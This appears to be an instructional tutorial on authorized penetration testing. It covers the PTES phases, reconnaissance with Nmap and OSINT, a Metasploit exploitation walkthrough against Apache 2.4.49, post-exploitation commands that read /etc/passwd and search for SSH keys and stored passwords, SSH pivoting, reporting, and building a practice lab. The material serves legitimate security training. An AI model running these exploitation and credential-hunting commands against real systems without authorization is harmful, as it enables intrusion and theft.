What is Penetration Testing?

Penetration testing is a controlled, authorized simulation of a real-world attack against a computer system, network, or application. The goal is to identify security weaknesses before malicious attackers do, and to provide the organization with actionable evidence of what could be exploited and how to fix it.

Unlike vulnerability scanning, which uses automated tools to detect known issues, penetration testing involves a skilled tester who thinks creatively, chains vulnerabilities together, and demonstrates the real-world impact of security gaps. A vulnerability scanner might report that a service is running an outdated version. A penetration tester proves that this outdated version can be exploited to gain administrative access to the entire network.

There are several types of penetration tests, categorized by the information provided to the tester:

• Black box - The tester has no prior knowledge of the target systems, simulating an external attacker
• White box - The tester has full access to source code, architecture diagrams, and credentials, enabling a thorough review
• Grey box - The tester has partial knowledge, such as user-level credentials or network diagrams, simulating an insider or a compromised account

The PTES Framework

The Penetration Testing Execution Standard (PTES) is the most widely referenced methodology for conducting professional penetration tests. It defines seven phases that cover the complete lifecycle of an engagement, from the initial business discussion through to the final report.

Following a standardized methodology ensures consistency, completeness, and professionalism. It also provides a common language between the tester and the client, making it clear what was tested, how it was tested, and what was found.

• Pre-engagement Interactions - Defining scope, rules of engagement, timelines, and legal authorization
• Intelligence Gathering - Collecting information about the target using passive and active reconnaissance
• Threat Modeling - Identifying the most likely attack vectors and high-value targets based on gathered intelligence
• Vulnerability Analysis - Discovering and validating security weaknesses in the target environment
• Exploitation - Attempting to exploit confirmed vulnerabilities to demonstrate real-world impact
• Post-Exploitation - Determining the value of compromised systems and establishing persistence or pivoting further
• Reporting - Documenting all findings, evidence, and remediation recommendations in a professional report

Pre-Engagement Phase

The pre-engagement phase is arguably the most important, because it establishes the legal and operational boundaries for everything that follows. Skipping or rushing this phase leads to scope disputes, legal liability, and incomplete tests.

Scope Definition

The scope document defines exactly what is included in the test and what is off-limits. This must be agreed upon and signed by both parties before any technical work begins.

• In-scope targets - Specific IP addresses, domains, applications, or network ranges to be tested
• Out-of-scope targets - Systems that must not be touched (production databases, third-party services, partner networks)
• Testing window - Dates and hours when testing is permitted, especially for active exploitation
• Allowed techniques - Whether social engineering, physical access, or denial-of-service testing is permitted
• Communication plan - Who to contact if critical vulnerabilities are found, and how to report emergencies

Rules of Engagement

# Key items in a Rules of Engagement document:

1. Authorization letter signed by an authorized representative
2. Emergency contact information (24/7 phone number)
3. IP addresses the tester will use (for whitelisting if needed)
4. Data handling requirements (encryption, deletion timelines)
5. Restrictions on exploitation (no data exfiltration, no DoS)
6. Notification requirements (daily status updates, immediate
   notification for critical findings)
7. Retesting terms (will the tester verify fixes after remediation?)
8. Legal protections (hold harmless clause, NDA)

Reconnaissance and Scanning

Reconnaissance is the information-gathering phase where the tester learns as much as possible about the target before attempting any exploitation. Good reconnaissance dramatically increases the efficiency and effectiveness of later phases.

Passive Reconnaissance

Passive reconnaissance collects information without directly interacting with the target systems. This leaves no trace in the target's logs and is often performed first.

# OSINT tools for passive reconnaissance:

# WHOIS lookup - domain registration details
whois example.com

# DNS enumeration - discover subdomains and mail servers
dig example.com ANY
dig example.com MX
host -t ns example.com

# Subdomain discovery using public certificate transparency logs
# https://crt.sh/?q=%.example.com

# Google dorking - find exposed files and directories
# site:example.com filetype:pdf
# site:example.com intitle:"index of"
# site:example.com inurl:admin

# Shodan - search for internet-connected devices
# https://www.shodan.io/search?query=hostname:example.com

# theHarvester - automated OSINT gathering
theHarvester -d example.com -b google,bing,linkedin

Active Scanning

Active scanning directly probes the target systems to discover open ports, running services, and operating system versions. This phase generates network traffic that may be detected by the target's security monitoring.

# Nmap - the standard network scanner

# Host discovery (ping sweep)
nmap -sn 192.168.1.0/24

# Port scan with service version detection
nmap -sV -sC -p- target.example.com

# Aggressive scan with OS detection (slower but thorough)
nmap -A -T4 target.example.com

# UDP scan (often overlooked but important)
nmap -sU --top-ports 100 target.example.com

# Output results to multiple formats for later analysis
nmap -sV -sC -oA scan-results target.example.com

• -sV - Probe open ports to determine service and version information
• -sC - Run default NSE scripts for additional enumeration
• -p- - Scan all 65535 TCP ports instead of just the top 1000
• -A - Enable OS detection, version detection, script scanning, and traceroute
• -oA - Output in all formats (normal, XML, grepable) simultaneously

Vulnerability Analysis and Exploitation

With reconnaissance data in hand, the tester identifies potential vulnerabilities and attempts to exploit them. This is where the penetration test diverges from a vulnerability scan: the tester does not just report that a weakness might exist, but proves it by demonstrating controlled exploitation.

Vulnerability Analysis

Cross-reference the discovered services and versions against known vulnerability databases to identify potential attack vectors.

# Search for known vulnerabilities:

# searchsploit - local copy of Exploit-DB
searchsploit apache 2.4.49
searchsploit openssh 8.2

# Nmap vulnerability scripts
nmap --script vuln target.example.com

# Manual research
# - CVE databases (cve.mitre.org, nvd.nist.gov)
# - Vendor security advisories
# - Exploit-DB (exploit-db.com)
# - GitHub proof-of-concept repositories

Exploitation

Exploitation is the controlled attempt to leverage a vulnerability to gain unauthorized access or demonstrate impact. Always use the minimum force necessary to prove the vulnerability exists.

# Metasploit Framework - the most common exploitation tool

# Start the Metasploit console
msfconsole

# Search for an exploit module
msf6> search type:exploit apache 2.4.49

# Select and configure the exploit
msf6> use exploit/multi/http/apache_normalize_path_rce
msf6 exploit(...)> set RHOSTS target.example.com
msf6 exploit(...)> set RPORT 443
msf6 exploit(...)> set SSL true
msf6 exploit(...)> set LHOST 10.10.14.5

# Check if the target is vulnerable before exploiting
msf6 exploit(...)> check

# Run the exploit
msf6 exploit(...)> exploit

Post-Exploitation and Pivoting

After gaining initial access, the post-exploitation phase determines the true impact of the compromise. The tester explores what data is accessible, whether privilege escalation is possible, and whether the compromised system can be used as a stepping stone to reach other parts of the network.

Post-Exploitation Objectives

• Privilege escalation - Attempt to elevate from a regular user to administrator or root access
• Data identification - Locate sensitive data (credentials, PII, financial records) that demonstrates business impact
• Persistence - Demonstrate how an attacker could maintain access (document the technique but remove any artifacts afterward)
• Lateral movement - Pivot from the compromised system to other systems on the network
• Evidence collection - Screenshot and log everything for the report

# Common post-exploitation commands (Linux target):

# Determine current user and privileges
whoami
id
sudo -l

# Enumerate the system
uname -a
cat /etc/os-release
cat /etc/passwd
ls -la /home/

# Search for sensitive files
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa" -readable 2>/dev/null
grep -r "password" /etc/ 2>/dev/null

# Check network connectivity for pivoting
ip addr
ip route
ss -tlnp
cat /etc/hosts

# Common post-exploitation commands (Windows target):

# System information
whoami /all
systeminfo
net user
net localgroup administrators

# Search for credentials
dir /s /b C:\Users\*.txt
dir /s /b C:\Users\*.kdbx
reg query HKLM /f password /t REG_SZ /s

Pivoting

Pivoting uses a compromised system as a relay to access other networks or systems that are not directly reachable from the tester's machine. This often reveals that a single compromised web server can lead to full internal network access.

# Example: SSH port forwarding for pivoting
# After compromising a system with access to an internal network:

# Forward local port 8888 to an internal web server (10.10.10.50:80)
ssh -L 8888:10.10.10.50:80 user@compromised-host

# Now access the internal web server from your browser:
# http://127.0.0.1:8888

# Dynamic SOCKS proxy for scanning the internal network
ssh -D 9050 user@compromised-host

# Route Nmap through the SOCKS proxy
proxychains nmap -sT -Pn 10.10.10.0/24

Writing Professional Pentest Reports

The report is the most important deliverable of a penetration test. It is what the client pays for, and it determines whether vulnerabilities get fixed. A technically brilliant test with a poor report has far less impact than a competent test with an excellent report.

Report Structure

A professional penetration test report typically contains the following sections:

• Executive summary - A non-technical overview for management that explains the overall risk level, key findings, and recommended priorities (1-2 pages)
• Scope and methodology - What was tested, what was not tested, the testing methodology used, and the dates of the engagement
• Findings summary - A table listing all findings sorted by severity, with a risk rating for each
• Detailed findings - Each vulnerability documented individually with description, evidence, impact, and remediation
• Attack narrative - A chronological walkthrough of how the tester progressed through the environment, showing how individual findings chained together
• Remediation roadmap - Prioritized list of fixes grouped into immediate, short-term, and long-term actions
• Appendices - Raw scan output, tool lists, and methodology references

# Severity rating scale (align with client expectations):

Critical - Immediate exploitation possible with severe business impact
           (e.g., unauthenticated remote code execution on production)

High     - Exploitation likely with significant impact
           (e.g., SQL injection exposing customer database)

Medium   - Exploitation possible under specific conditions
           (e.g., stored XSS in internal application)

Low      - Minimal direct impact but indicates security weakness
           (e.g., verbose error messages, missing security headers)

Informational - Best practice recommendations, no direct vulnerability
               (e.g., consider implementing CSP headers)

Building a Pentest Lab

Before testing real systems, build a practice lab where you can learn tools and techniques safely and legally. A home lab provides an unlimited, consequence-free environment to make mistakes and develop your skills.

Lab Setup Essentials

• Virtualization software - VirtualBox (free) or VMware Workstation for running multiple virtual machines
• Attack machine - Kali Linux or Parrot OS, pre-loaded with penetration testing tools
• Vulnerable targets - Intentionally vulnerable machines for practice
• Isolated network - Use host-only or internal networking to keep lab traffic off your real network

# Recommended vulnerable machines and platforms:

# Metasploitable 2/3 - Intentionally vulnerable Linux VM
# Download from: https://sourceforge.net/projects/metasploitable/

# DVWA (Damn Vulnerable Web Application)
# Run in Docker:
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# OWASP Juice Shop - Modern vulnerable web application
docker run --rm -p 3000:3000 bkimminich/juice-shop

# HackTheBox and TryHackMe - Online platforms with guided
# challenges ranging from beginner to expert

# VulnHub - Download pre-built vulnerable VMs
# https://www.vulnhub.com/

# Basic lab network setup in VirtualBox:
# 1. Create a Host-Only network (192.168.56.0/24)
# 2. Attach Kali Linux to this network
# 3. Attach vulnerable VMs to the same network
# 4. All machines can communicate but are isolated from the internet

Summary

In this tutorial, you learned:

• What penetration testing is and how it differs from vulnerability scanning
• The seven phases of the PTES framework that guide a professional engagement
• How to define scope, rules of engagement, and legal authorization in the pre-engagement phase
• Passive and active reconnaissance techniques for gathering intelligence about a target
• How to analyze vulnerabilities and demonstrate exploitation with tools like Metasploit
• Post-exploitation techniques including privilege escalation, lateral movement, and pivoting
• How to structure a professional penetration testing report for both technical and executive audiences
• How to build an isolated practice lab for developing your skills safely and legally